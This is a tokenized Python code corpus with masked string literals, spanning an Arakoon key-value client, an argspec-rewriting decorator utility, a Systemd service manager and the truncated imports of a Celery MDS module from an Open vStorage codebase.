backoffPeriod * tryCount <EOL> if time . time ( ) + sleepPeriod > deadline : <EOL> raise <EOL> tryCount += <NUM_LIT:1.0> <EOL> ArakoonClientLogger . logWarning ( "<STR_LIT>" % ( ex , sleepPeriod ) ) <EOL> time . sleep ( sleepPeriod ) <EOL> return retVal <EOL> return retrying_f <EOL> return wrap <EOL> class ArakoonClient : <EOL> def __init__ ( self , config = None ) : <EOL> """<STR_LIT>""" <EOL> if config is None : <EOL> config = ArakoonClientConfig ( ) <EOL> self . _initialize ( config ) <EOL> self . __lock = threading . RLock ( ) <EOL> self . _masterId = None <EOL> self . _connections = dict ( ) <EOL> self . _consistency = Consistent ( ) <EOL> nodeList = self . _config . getNodes ( ) . keys ( ) <EOL> if len ( nodeList ) == <NUM_LIT:0> : <EOL> raise ArakoonInvalidConfig ( "<STR_LIT>" ) <EOL> self . _dirtyReadNode = random . choice ( nodeList ) <EOL> def allowDirtyReads ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _consistency = NoGuarantee ( ) <EOL> def disallowDirtyReads ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _consistency = Consistent ( ) <EOL> def setConsistency ( self , c ) : <EOL> """<STR_LIT>""" <EOL> self . _consistency = c <EOL> def _initialize ( self , config ) : <EOL> self . _config = config <EOL> def __send__ ( self , msg ) : <EOL> if self . _consistency . isDirty ( ) : <EOL> conn = self . _sendMessage ( self . _dirtyReadNode , msg ) <EOL> else : <EOL> conn = self . _sendToMaster ( msg ) <EOL> return conn <EOL> @ utils . update_argspec ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def setDirtyReadNode ( self , node ) : <EOL> """<STR_LIT>""" <EOL> if node not in self . _config . getNodes ( ) . keys ( ) : <EOL> raise ArakoonUnknownNode ( node ) <EOL> self . _dirtyReadNode = node <EOL> @ utils . update_argspec ( '<STR_LIT>' ) <EOL> @ retryDuringMasterReelection ( is_read_only = True ) <EOL> def getKeyCount ( self ) : <EOL> """<STR_LIT>""" <EOL> encoded = ArakoonProtocol . encodeGetKeyCount ( ) <EOL> conn = self . _sendToMaster ( encoded ) <EOL> return conn . decodeInt64Result ( ) <EOL> def getDirtyReadNode ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _dirtyReadNode <EOL> @ utils . update_argspec ( '<STR_LIT>' , '<STR_LIT>' , ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> @ retryDuringMasterReelection ( is_read_only = True ) <EOL> @ SignatureValidator ( '<STR_LIT:string>' , '<STR_LIT:string>' ) <EOL> def hello ( self , clientId , clusterId = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> encoded = ArakoonProtocol . encodePing ( clientId , clusterId ) <EOL> conn = self . _sendToMaster ( encoded ) <EOL> return conn . decodeStringResult ( ) <EOL> def getVersion ( self , nodeId = None ) : <EOL> """<STR_LIT>""" <EOL> msg = ArakoonProtocol . encodeGetVersion ( ) <EOL> conn = None <EOL> if nodeId is None : <EOL> conn = self . _sendToMaster ( msg ) <EOL> else : <EOL> conn = self . _sendMessage ( nodeId , msg ) <EOL> result = conn . decodeVersionResult ( ) <EOL> return result <EOL> def getCurrentState ( self , nodeId = None ) : <EOL> """<STR_LIT>""" <EOL> msg = ArakoonProtocol . encodeGetCurrentState ( ) <EOL> conn = None <EOL> if nodeId is None : <EOL> conn = self . _sendToMaster ( msg ) <EOL> else : <EOL> conn = self . _sendMessage ( nodeId , msg ) <EOL> result = conn . decodeStringResult ( ) <EOL> return result <EOL> @ utils . update_argspec ( '<STR_LIT>' , '<STR_LIT:key>' ) <EOL> @ retryDuringMasterReelection ( is_read_only = True ) <EOL> @ SignatureValidator ( '<STR_LIT:string>' ) <EOL> def exists ( self , key ) : <EOL> """<STR_LIT>""" <EOL> msg = ArakoonProtocol . encodeExists ( key , self . _consistency ) <EOL> conn = self . __send__ ( msg ) <EOL> return conn . decodeBoolResult ( ) <EOL> @ utils . update_argspec ( '<STR_LIT>' , '<STR_LIT:key>' ) <EOL> @ retryDuringMasterReelection ( is_read_only = True ) <EOL> @ SignatureValidator ( '<STR_LIT:string>' ) <EOL> def get ( self , key ) : <EOL> """<STR_LIT>""" <EOL> msg = ArakoonProtocol . encodeGet ( key , self . _consistency ) <EOL> conn = self . __send__ ( msg ) <EOL> result = conn . decodeStringResult ( ) <EOL> return result <EOL> @ utils . update_argspec ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> @ retryDuringMasterReelection ( is_read_only = True ) <EOL> def multiGet ( self , keys ) : <EOL> """<STR_LIT>""" <EOL> msg = ArakoonProtocol . encodeMultiGet ( keys , self . _consistency ) <EOL> conn = self . __send__ ( msg ) <EOL> result = conn . decodeStringListResult ( ) <EOL> return result <EOL> @ utils . update_argspec ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> @ retryDuringMasterReelection ( is_read_only = True ) <EOL> def multiGetOption ( self , keys ) : <EOL> """<STR_LIT>""" <EOL> msg = ArakoonProtocol . encodeMultiGetOption ( keys , self . _consistency ) <EOL> conn = self . __send__ ( msg ) <EOL> result = conn . decodeStringOptionArrayResult ( ) <EOL> return result <EOL> @ utils . update_argspec ( '<STR_LIT>' , '<STR_LIT:key>' , '<STR_LIT:value>' ) <EOL> @ retryDuringMasterReelection ( ) <EOL> @ SignatureValidator ( '<STR_LIT:string>' , '<STR_LIT:string>' ) <EOL> def set ( self , key , value ) : <EOL> """<STR_LIT>""" <EOL> conn = self . _sendToMaster ( ArakoonProtocol . encodeSet ( key , value ) ) <EOL> conn . decodeVoidResult ( ) <EOL> @ retryDuringMasterReelection ( ) <EOL> def nop ( self ) : <EOL> """<STR_LIT>""" <EOL> conn = self . _sendToMaster ( ArakoonProtocol . encodeNOP ( ) ) <EOL> conn . decodeVoidResult ( ) <EOL> @ retryDuringMasterReelection ( ) <EOL> def get_txid ( self ) : <EOL> """<STR_LIT>""" <EOL> conn = self . _sendToMaster ( ArakoonProtocol . encodeGetTxid ( ) ) <EOL> result = conn . decodeGetTxidResult ( ) <EOL> return result <EOL> @ utils . update_argspec ( '<STR_LIT>' , '<STR_LIT:key>' , '<STR_LIT:value>' ) <EOL> @ retryDuringMasterReelection ( ) <EOL> @ SignatureValidator ( '<STR_LIT:string>' , '<STR_LIT:string>' ) <EOL> def confirm ( self , key , value ) : <EOL> """<STR_LIT>""" <EOL> msg = ArakoonProtocol . encodeConfirm ( key , value ) <EOL> conn = self . _sendToMaster ( msg ) <EOL> conn . decodeVoidResult ( ) <EOL> @ utils . update_argspec ( '<STR_LIT>' , '<STR_LIT:key>' , '<STR_LIT>' ) <EOL> @ retryDuringMasterReelection ( is_read_only = True ) <EOL> @ SignatureValidator ( '<STR_LIT:string>' , '<STR_LIT>' ) <EOL> def aSSert ( self , key , vo ) : <EOL> """<STR_LIT>""" <EOL> msg = ArakoonProtocol . encodeAssert ( key , vo , self . _consistency ) <EOL> conn = self . __send__ ( msg ) <EOL> result = conn . decodeVoidResult ( ) <EOL> return result <EOL> @ utils . update_argspec ( '<STR_LIT>' , '<STR_LIT:key>' ) <EOL> @ retryDuringMasterReelection ( is_read_only = True ) <EOL> @ SignatureValidator ( '<STR_LIT:string>' ) <EOL> def aSSert_exists ( self , key ) : <EOL> """<STR_LIT>""" <EOL> msg = ArakoonProtocol . encodeAssertExists ( key , self . _consistency ) <EOL> conn = self . __send__ ( msg ) <EOL> result = conn . decodeVoidResult ( ) <EOL> return result <EOL> @ utils . update_argspec ( '<STR_LIT>' , '<STR_LIT>' , ( '<STR_LIT>' , False ) ) <EOL> @ retryDuringMasterReelection ( ) <EOL> @ SignatureValidator ( '<STR_LIT>' , '<STR_LIT:bool>' ) <EOL> def sequence ( self , seq , sync = False ) : <EOL> """<STR_LIT>""" <EOL> encoded = ArakoonProtocol . encodeSequence ( seq , sync ) <EOL> conn = self . _sendToMaster ( encoded ) <EOL> conn . decodeVoidResult ( ) <EOL> def makeSequence ( self ) : <EOL> """<STR_LIT>""" <EOL> return Sequence ( ) <EOL> @ utils . update_argspec ( '<STR_LIT>' , '<STR_LIT:key>' ) <EOL> @ retryDuringMasterReelection ( ) <EOL> @ SignatureValidator ( '<STR_LIT:string>' ) <EOL> def delete ( self , key ) : <EOL> """<STR_LIT>""" <EOL> conn = self . _sendToMaster ( ArakoonProtocol . encodeDelete ( key ) ) <EOL> conn . decodeVoidResult ( ) <EOL> @ utils . update_argspec ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> @ retryDuringMasterReelection ( ) <EOL> @ SignatureValidator ( '<STR_LIT:string>' ) <EOL> def deletePrefix ( self , prefix ) : <EOL> """<STR_LIT>""" <EOL> msg = ArakoonProtocol . encodeDeletePrefix ( prefix ) <EOL> conn = self . _sendToMaster ( msg ) <EOL> result = conn . decodeIntResult ( ) <EOL> return result <EOL> __setitem__ = set <EOL> __getitem__ = get <EOL> __delitem__ = delete <EOL> __contains__ = exists <EOL> @ utils . update_argspec ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , ( '<STR_LIT>' , <NUM_LIT:1000> ) ) <EOL> @ retryDuringMasterReelection ( is_read_only = True ) <EOL> @ SignatureValidator ( '<STR_LIT>' , '<STR_LIT:bool>' , '<STR_LIT>' , '<STR_LIT:bool>' , '<STR_LIT:int>' ) <EOL> def range ( self , beginKey , beginKeyIncluded , endKey , endKeyIncluded , maxElements = <NUM_LIT:1000> ) : <EOL> """<STR_LIT>""" <EOL> msg = ArakoonProtocol . encodeRange ( beginKey , beginKeyIncluded , endKey , <EOL> endKeyIncluded , maxElements , self . _consistency ) <EOL> conn = self . __send__ ( msg ) <EOL> return conn . decodeStringListResult ( ) <EOL> @ utils . update_argspec ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , ( '<STR_LIT>' , <NUM_LIT:1000> ) ) <EOL> @ retryDuringMasterReelection ( is_read_only = True ) <EOL> @ SignatureValidator ( '<STR_LIT>' , '<STR_LIT:bool>' , '<STR_LIT>' , '<STR_LIT:bool>' , '<STR_LIT:int>' ) <EOL> def range_entries ( self , <EOL> beginKey , <EOL> beginKeyIncluded , <EOL> endKey , <EOL> endKeyIncluded , <EOL> maxElements = <NUM_LIT:1000> ) : <EOL> """<STR_LIT>""" <EOL> msg = ArakoonProtocol . encodeRangeEntries ( beginKey , <EOL> beginKeyIncluded , <EOL> endKey , <EOL> endKeyIncluded , <EOL> maxElements , <EOL> self . _consistency ) <EOL> conn = self . __send__ ( msg ) <EOL> result = conn . decodeStringPairListResult ( ) <EOL> return result <EOL> @ utils . update_argspec ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , ( '<STR_LIT>' , <NUM_LIT:1000> ) ) <EOL> @ retryDuringMasterReelection ( is_read_only = True ) <EOL> @ SignatureValidator ( '<STR_LIT>' , '<STR_LIT:bool>' , '<STR_LIT>' , '<STR_LIT:bool>' , '<STR_LIT:int>' ) <EOL> def rev_range_entries ( self , <EOL> beginKey , beginKeyIncluded , <EOL> endKey , endKeyIncluded , <EOL> maxElements = <NUM_LIT:1000> ) : <EOL> """<STR_LIT>""" <EOL> msg = ArakoonProtocol . encodeReverseRangeEntries ( beginKey , <EOL> beginKeyIncluded , <EOL> endKey , <EOL> endKeyIncluded , <EOL> maxElements , <EOL> self . _consistency ) <EOL> conn = self . __send__ ( msg ) <EOL> result = conn . decodeStringPairListResult ( ) <EOL> return result <EOL> @ utils . update_argspec ( '<STR_LIT>' , '<STR_LIT>' , ( '<STR_LIT>' , <NUM_LIT:1000> ) ) <EOL> @ retryDuringMasterReelection ( is_read_only = True ) <EOL> @ SignatureValidator ( '<STR_LIT:string>' , '<STR_LIT:int>' ) <EOL> def prefix ( self , keyPrefix , maxElements = <NUM_LIT:1000> ) : <EOL> """<STR_LIT>""" <EOL> msg = ArakoonProtocol . encodePrefixKeys ( keyPrefix , maxElements , self . _consistency ) <EOL> conn = self . __send__ ( msg ) <EOL> return conn . decodeStringListResult ( ) <EOL> def whoMaster ( self ) : <EOL> self . _determineMaster ( ) <EOL> return self . _masterId <EOL> def expectProgressPossible ( self ) : <EOL> """<STR_LIT>""" <EOL> msg = ArakoonProtocol . encodeExpectProgressPossible ( ) <EOL> try : <EOL> conn = self . _sendToMaster ( msg ) <EOL> return conn . decodeBoolResult ( ) <EOL> except ArakoonNoMaster : <EOL> return False <EOL> def statistics ( self ) : <EOL> """<STR_LIT>""" <EOL> msg = ArakoonProtocol . encodeStatistics ( ) <EOL> conn = self . _sendToMaster ( msg ) <EOL> return conn . decodeStatistics ( ) <EOL> @ utils . update_argspec ( '<STR_LIT>' , '<STR_LIT:key>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> @ retryDuringMasterReelection ( ) <EOL> @ SignatureValidator ( '<STR_LIT:string>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def testAndSet ( self , key , oldValue , newValue ) : <EOL> """<STR_LIT>""" <EOL> msg = ArakoonProtocol . encodeTestAndSet ( key , oldValue , newValue ) <EOL> conn = self . _sendToMaster ( msg ) <EOL> return conn . decodeStringOptionResult ( ) <EOL> @ utils . update_argspec ( '<STR_LIT>' , '<STR_LIT:key>' , '<STR_LIT>' ) <EOL> @ retryDuringMasterReelection ( ) <EOL> @ SignatureValidator ( '<STR_LIT:string>' , '<STR_LIT>' ) <EOL> def replace ( self , key , wanted ) : <EOL> """<STR_LIT>""" <EOL> msg = ArakoonProtocol . encodeReplace ( key , wanted ) <EOL> conn = self . _sendToMaster ( msg ) <EOL> return conn . decodeStringOptionResult ( ) <EOL> @ utils . update_argspec ( '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' ) <EOL> @ retryDuringMasterReelection ( ) <EOL> @ SignatureValidator ( '<STR_LIT:string>' , '<STR_LIT>' ) <EOL> def userFunction ( self , name , argument ) : <EOL> '''<STR_LIT>''' <EOL> msg = ArakoonProtocol . encodeUserFunction ( name , argument ) <EOL> conn = self . _sendToMaster ( msg ) <EOL> return conn . decodeStringOptionResult ( ) <EOL> @ utils . update_argspec ( '<STR_LIT>' ) <EOL> @ retryDuringMasterReelection ( is_read_only = True ) <EOL> def getNurseryConfig ( self ) : <EOL> msg = ArakoonProtocol . encodeGetNurseryCfg ( ) <EOL> con = self . _sendToMaster ( msg ) <EOL> return con . decodeNurseryCfgResult ( ) <EOL> def dropConnections ( self ) : <EOL> '''<STR_LIT>''' <EOL> keysToRemove = self . _connections . keys ( ) <EOL> for key in keysToRemove : <EOL> self . _connections [ key ] . close ( ) <EOL> del self . _connections [ key ] <EOL> def _determineMaster ( self ) : <EOL> nodeIds = [ ] <EOL> if self . _masterId is None : <EOL> nodeIds = self . _config . getNodes ( ) . keys ( ) <EOL> random . shuffle ( nodeIds ) <EOL> while self . _masterId is None and len ( nodeIds ) > <NUM_LIT:0> : <EOL> node = nodeIds . pop ( ) <EOL> try : <EOL> self . _masterId = self . _getMasterIdFromNode ( node ) <EOL> tmpMaster = self . _masterId <EOL> try : <EOL> if self . _masterId is not None : <EOL> if self . _masterId != node and not self . _validateMasterId ( self . _masterId ) : <EOL> self . _masterId = None <EOL> else : <EOL> ArakoonClientLogger . logWarning ( "<STR_LIT>" , node ) <EOL> except Exception , ex : <EOL> ArakoonClientLogger . logWarning ( "<STR_LIT>" , tmpMaster ) <EOL> ArakoonClientLogger . logDebug ( "<STR_LIT>" % ( ex . __class__ . __name__ , ex ) ) <EOL> self . _masterId = None <EOL> except Exception , ex : <EOL> ArakoonClientLogger . logWarning ( "<STR_LIT>" , node ) <EOL> ArakoonClientLogger . logDebug ( "<STR_LIT>" % ( ex . __class__ . __name__ , ex ) ) <EOL> if self . _masterId is None : <EOL> ArakoonClientLogger . logError ( "<STR_LIT>" ) <EOL> raise ArakoonNoMaster ( ) <EOL> def _sendToMaster ( self , msg ) : <EOL> self . _determineMaster ( ) <EOL> retVal = self . _sendMessage ( self . _masterId , msg ) <EOL> if retVal is None : <EOL> raise ArakoonNoMasterResult ( ) <EOL> return retVal <EOL> def _validateMasterId ( self , masterId ) : <EOL> if masterId is None : <EOL> return False <EOL> otherMasterId = self . _getMasterIdFromNode ( masterId ) <EOL> return masterId == otherMasterId <EOL> def _getMasterIdFromNode ( self , nodeId ) : <EOL> conn = self . _sendMessage ( nodeId , ArakoonProtocol . encodeWhoMaster ( ) ) <EOL> masterId = conn . decodeStringOptionResult ( ) <EOL> return masterId <EOL> def _sleep ( self , timeout ) : <EOL> time . sleep ( timeout ) <EOL> def _sendMessage ( self , nodeId , msgBuffer , tryCount = - <NUM_LIT:1> ) : <EOL> result = None <EOL> if tryCount == - <NUM_LIT:1> : <EOL> tryCount = self . _config . getTryCount ( ) <EOL> for i in range ( tryCount ) : <EOL> if i > <NUM_LIT:0> : <EOL> maxSleep = i * ArakoonClientConfig . getBackoffInterval ( ) <EOL> self . _sleep ( random . randint ( <NUM_LIT:0> , maxSleep ) ) <EOL> with self . __lock : <EOL> try : <EOL> connection = self . _getConnection ( nodeId ) <EOL> connection . send ( msgBuffer ) <EOL> result = connection <EOL> break <EOL> except Exception , ex : <EOL> fmt = "<STR_LIT>" <EOL> ArakoonClientLogger . logWarning ( fmt , i , nodeId , <EOL> ex . __class__ . __name__ , ex ) <EOL> self . _connections [ nodeId ] . close ( ) <EOL> del self . _connections [ nodeId ] <EOL> self . _masterId = None <EOL> if result is None : <EOL> raise <EOL> return result <EOL> def _getConnection ( self , nodeId ) : <EOL> connection = None <EOL> if self . _connections . has_key ( nodeId ) : <EOL> connection = self . _connections [ nodeId ] <EOL> if connection is None : <EOL> nodeLocations = self . _config . getNodeLocations ( nodeId ) <EOL> clusterId = self . _config . getClusterId ( ) <EOL> connection = ArakoonClientConnection ( nodeLocations , clusterId , <EOL> self . _config ) <EOL> self . _connections [ nodeId ] = connection <EOL> return connection </s>
<s> '''<STR_LIT>''' <EOL> import __builtin__ <EOL> import uuid <EOL> import functools <EOL> import itertools <EOL> from ovs . log . logHandler import LogHandler <EOL> LOGGER = LogHandler . get ( '<STR_LIT>' , '<STR_LIT>' , propagate = False ) <EOL> '''<STR_LIT>''' <EOL> def update_argspec ( * argnames ) : <EOL> '''<STR_LIT>''' <EOL> argnames_ = tuple ( itertools . chain ( argnames , ( '<STR_LIT>' , ) ) ) <EOL> context = { <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : __builtin__ . dict , <EOL> '<STR_LIT>' : __builtin__ . zip , <EOL> '<STR_LIT:True>' : True , <EOL> '<STR_LIT:False>' : False , <EOL> } <EOL> def _format ( value ) : <EOL> '''<STR_LIT>''' <EOL> if isinstance ( value , unicode ) : <EOL> return '<STR_LIT>' % value <EOL> elif isinstance ( value , str ) : <EOL> return '<STR_LIT>' % value <EOL> elif isinstance ( value , bool ) : <EOL> return '<STR_LIT:True>' if value else '<STR_LIT:False>' <EOL> elif isinstance ( value , ( int , long ) ) : <EOL> return '<STR_LIT>' % value <EOL> elif value is None : <EOL> return '<STR_LIT:None>' <EOL> else : <EOL> raise TypeError <EOL> def _generate_signature ( args ) : <EOL> '''<STR_LIT>''' <EOL> for arg in args : <EOL> if isinstance ( arg , str ) : <EOL> yield '<STR_LIT:%s>' % arg <EOL> else : <EOL> arg , default = arg <EOL> yield '<STR_LIT>' % ( arg , _format ( default ) ) <EOL> template_signature = '<STR_LIT:U+002CU+0020>' . join ( _generate_signature ( argnames_ ) ) <EOL> template_args = '<STR_LIT:U+002CU+0020>' . join ( name if isinstance ( name , str ) else name [ <NUM_LIT:0> ] for name in argnames_ ) if argnames_ else '<STR_LIT>' <EOL> template_argnames = '<STR_LIT:U+002CU+0020>' . join ( <EOL> '<STR_LIT>' % ( name if isinstance ( name , str ) else name [ <NUM_LIT:0> ] ) <EOL> for name in argnames_ ) if argnames_ else '<STR_LIT>' <EOL> fun_def_template = '''<STR_LIT>''' % { <EOL> '<STR_LIT>' : template_signature , <EOL> '<STR_LIT:args>' : template_args , <EOL> '<STR_LIT>' : template_argnames , <EOL> } <EOL> def wrapper ( fun ) : <EOL> '''<STR_LIT>''' <EOL> random_suffix = lambda : str ( uuid . uuid4 ( ) ) . replace ( '<STR_LIT:->' , '<STR_LIT>' ) <EOL> orig_function_name = None <EOL> while ( not orig_function_name ) or ( orig_function_name in argnames_ ) : <EOL> orig_function_name = '<STR_LIT>' % random_suffix ( ) <EOL> kwargs_name = None <EOL> while ( not kwargs_name ) or ( kwargs_name in argnames_ ) : <EOL> kwargs_name = '<STR_LIT>' % random_suffix ( ) <EOL> fun_def = fun_def_template % { <EOL> '<STR_LIT:name>' : fun . __name__ , <EOL> '<STR_LIT>' : orig_function_name , <EOL> '<STR_LIT>' : kwargs_name , <EOL> } <EOL> code = compile ( fun_def , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> env = context . copy ( ) <EOL> env [ orig_function_name ] = fun <EOL> eval ( code , env , env ) <EOL> fun_wrapper = env [ fun . __name__ ] <EOL> updated = functools . update_wrapper ( fun_wrapper , fun ) <EOL> return updated <EOL> return wrapper <EOL> def format_doc ( doc ) : <EOL> '''<STR_LIT>''' <EOL> if isinstance ( doc , str ) : <EOL> doc = doc . decode ( '<STR_LIT:utf-8>' ) <EOL> return u'<STR_LIT:\n>' . join ( line . strip ( ) for line in doc . splitlines ( ) ) <EOL> def kill_coroutine ( coroutine , log_fun = None ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> coroutine . close ( ) <EOL> except : <EOL> try : <EOL> if log_fun : <EOL> log_fun ( '<STR_LIT>' ) <EOL> except : <EOL> pass <EOL> def process_blocking ( message , stream ) : <EOL> '''<STR_LIT>''' <EOL> for bytes_ in message . serialize ( ) : <EOL> stream . write ( bytes_ ) <EOL> return read_blocking ( message . receive ( ) , stream . read ) <EOL> def read_blocking ( receiver , read_fun ) : <EOL> '''<STR_LIT>''' <EOL> from ovs . extensions . db . arakoon . pyrakoon . pyrakoon import protocol <EOL> request = receiver . next ( ) <EOL> while isinstance ( request , protocol . Request ) : <EOL> value = read_fun ( request . count ) <EOL> request = receiver . send ( value ) <EOL> if not isinstance ( request , protocol . Result ) : <EOL> raise TypeError <EOL> kill_coroutine ( receiver , LOGGER . exception ) <EOL> return request . value </s>
<s> """<STR_LIT>""" </s>
<s> """<STR_LIT>""" <EOL> from subprocess import CalledProcessError <EOL> from ovs . log . logHandler import LogHandler <EOL> logger = LogHandler . get ( '<STR_LIT>' , name = '<STR_LIT>' ) <EOL> class Systemd ( object ) : <EOL> """<STR_LIT>""" <EOL> @ staticmethod <EOL> def _service_exists ( name , client , path ) : <EOL> if path is None : <EOL> path = '<STR_LIT>' <EOL> file_to_check = '<STR_LIT>' . format ( path , name ) <EOL> return client . file_exists ( file_to_check ) <EOL> @ staticmethod <EOL> def _get_name ( name , client , path = None ) : <EOL> """<STR_LIT>""" <EOL> if Systemd . _service_exists ( name , client , path ) : <EOL> return name <EOL> if Systemd . _service_exists ( name , client , '<STR_LIT>' ) : <EOL> return name <EOL> name = '<STR_LIT>' . format ( name ) <EOL> if Systemd . _service_exists ( name , client , path ) : <EOL> return name <EOL> logger . info ( '<STR_LIT>' . format ( name ) ) <EOL> raise ValueError ( '<STR_LIT>' . format ( name ) ) <EOL> @ staticmethod <EOL> def add_service ( name , client , params = None , target_name = None , additional_dependencies = None ) : <EOL> if params is None : <EOL> params = { } <EOL> name = Systemd . _get_name ( name , client , '<STR_LIT>' ) <EOL> template_service = '<STR_LIT>' <EOL> if not client . file_exists ( template_service . format ( name ) ) : <EOL> return <EOL> template_file = client . file_read ( template_service . format ( name ) ) <EOL> for key , value in params . iteritems ( ) : <EOL> template_file = template_file . replace ( '<STR_LIT>' . format ( key ) , value ) <EOL> if '<STR_LIT>' in template_file : <EOL> service_name = name if target_name is None else target_name <EOL> template_file = template_file . replace ( '<STR_LIT>' , service_name . lstrip ( '<STR_LIT>' ) ) <EOL> template_file = template_file . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> dependencies = '<STR_LIT>' <EOL> if additional_dependencies : <EOL> for service in additional_dependencies : <EOL> dependencies += '<STR_LIT>' . format ( service ) <EOL> template_file = template_file . replace ( '<STR_LIT>' , dependencies ) <EOL> if target_name is None : <EOL> client . file_write ( '<STR_LIT>' . format ( name ) , template_file ) <EOL> else : <EOL> client . file_write ( '<STR_LIT>' . format ( target_name ) , template_file ) <EOL> name = target_name <EOL> try : <EOL> client . run ( '<STR_LIT>' ) <EOL> client . run ( '<STR_LIT>' . format ( name ) ) <EOL> except CalledProcessError as cpe : <EOL> output = cpe . output <EOL> logger . error ( '<STR_LIT>' . format ( name , output ) ) <EOL> raise Exception ( '<STR_LIT>' . format ( name , output ) ) <EOL> @ staticmethod <EOL> def get_service_status ( name , client , return_output = False ) : <EOL> name = Systemd . _get_name ( name , client ) <EOL> output = client . run ( '<STR_LIT>' . format ( name ) ) <EOL> if '<STR_LIT>' == output : <EOL> if return_output is True : <EOL> return True , output <EOL> return True <EOL> if '<STR_LIT>' == output : <EOL> if return_output is True : <EOL> return False , output <EOL> return False <EOL> if return_output is True : <EOL> return False , output <EOL> return False <EOL> @ staticmethod <EOL> def remove_service ( name , client ) : <EOL> name = Systemd . _get_name ( name , client ) <EOL> client . file_delete ( '<STR_LIT>' . format ( name ) ) <EOL> client . run ( '<STR_LIT>' ) <EOL> @ staticmethod <EOL> def disable_service ( name , client ) : <EOL> name = Systemd . _get_name ( name , client ) <EOL> try : <EOL> client . run ( '<STR_LIT>' . format ( name ) ) <EOL> except CalledProcessError as cpe : <EOL> output = cpe . output <EOL> logger . error ( '<STR_LIT>' . format ( name , output ) ) <EOL> raise Exception ( '<STR_LIT>' . format ( name , output ) ) <EOL> @ staticmethod <EOL> def enable_service ( name , client ) : <EOL> name = Systemd . _get_name ( name , client ) <EOL> try : <EOL> client . run ( '<STR_LIT>' . format ( name ) ) <EOL> except CalledProcessError as cpe : <EOL> output = cpe . output <EOL> logger . error ( '<STR_LIT>' . format ( name , output ) ) <EOL> raise Exception ( '<STR_LIT>' . format ( name , output ) ) <EOL> @ staticmethod <EOL> def start_service ( name , client ) : <EOL> status , output = Systemd . get_service_status ( name , client , True ) <EOL> if status is True : <EOL> return output <EOL> try : <EOL> name = Systemd . _get_name ( name , client ) <EOL> output = client . run ( '<STR_LIT>' . format ( name ) ) <EOL> except CalledProcessError as cpe : <EOL> output = cpe . output <EOL> logger . error ( '<STR_LIT>' . format ( name , output ) ) <EOL> return output <EOL> @ staticmethod <EOL> def stop_service ( name , client ) : <EOL> status , output = Systemd . get_service_status ( name , client , True ) <EOL> if status is False : <EOL> return output <EOL> try : <EOL> name = Systemd . _get_name ( name , client ) <EOL> output = client . run ( '<STR_LIT>' . format ( name ) ) <EOL> except CalledProcessError as cpe : <EOL> output = cpe . output <EOL> logger . error ( '<STR_LIT>' . format ( name , output ) ) <EOL> return output <EOL> @ staticmethod <EOL> def restart_service ( name , client ) : <EOL> try : <EOL> name = Systemd . _get_name ( name , client ) <EOL> output = client . run ( '<STR_LIT>' . format ( name ) ) <EOL> except CalledProcessError as cpe : <EOL> output = cpe . output <EOL> logger . error ( '<STR_LIT>' . format ( name , output ) ) <EOL> return output <EOL> @ staticmethod <EOL> def has_service ( name , client ) : <EOL> try : <EOL> Systemd . _get_name ( name , client ) <EOL> return True <EOL> except ValueError : <EOL> return False <EOL> @ staticmethod <EOL> def is_enabled ( name , client ) : <EOL> name = Systemd . _get_name ( name , client ) <EOL> output = client . run ( '<STR_LIT>' . format ( name ) ) <EOL> if '<STR_LIT>' in output : <EOL> return True <EOL> if '<STR_LIT>' in output : <EOL> return False <EOL> return False <EOL> @ staticmethod <EOL> def get_service_pid ( name , client ) : <EOL> pid = <NUM_LIT:0> <EOL> name = Systemd . _get_name ( name , client ) <EOL> if Systemd . get_service_status ( name , client ) : <EOL> output = client . run ( '<STR_LIT>' . format ( name ) ) <EOL> if output : <EOL> output = output . splitlines ( ) <EOL> for line in output : <EOL> if '<STR_LIT>' in line : <EOL> pid = line . split ( '<STR_LIT:U+0020>' ) [ <NUM_LIT:3> ] <EOL> if not pid . isdigit ( ) : <EOL> pid = <NUM_LIT:0> <EOL> break <EOL> return pid </s>
<s> """<STR_LIT>""" <EOL> import math <EOL> import time <EOL> import random <EOL> from celery . schedules import crontab <EOL> from ovs . celery_run import celery <EOL> from ovs . dal . hybrids . diskpartition import DiskPartition <EOL> from ovs . dal . hybrids . j_mdsservice import MDSService <EOL> from ovs . dal . hybrids . j_mdsservicevdisk import MDSServiceVDisk <EOL> from ovs . dal . hybrids . j_storagedriverpartition import StorageDriverPartition <EOL> from ovs . dal . hybrids . service import Service <EOL> from ovs . dal . hybrids . servicetype import ServiceType <EOL> from ovs . dal . hybrids . storagerouter import StorageRouter <EOL> from ovs . dal . lists . servicelist import ServiceList <EOL> from ovs . dal . lists . servicetypelist import ServiceTypeList <EOL> from ovs . dal . lists . vpoollist import VPoolList <EOL> from ovs . extensions . db . etcd . configuration import EtcdConfiguration <EOL> from ovs . extensions . generic . sshclient import SSHClient <EOL> from ovs . extensions . generic . sshclient import UnableToConnectException <EOL> from ovs . extensions . generic . system import System <EOL> from ovs . extensions . storageserver . storagedriver import MetadataServerClient <EOL> from ovs . extensions . storageserver . storagedriver import StorageDriverConfiguration <EOL> from ovs . lib . helpers . decorators import ensure_single <EOL> from ovs . log . logHandler import LogHandler <EOL> from volumedriver . storagerouter import storagerouterclient <EOL> from volumedriver . storagerouter . storagerouterclient import MDSMetaDataBackendConfig <EOL> from volumedriver . storagerouter . storagerouterclient import MDSNodeConfig <EOL> logger = LogHandler . get ( '<STR_LIT>' , name = 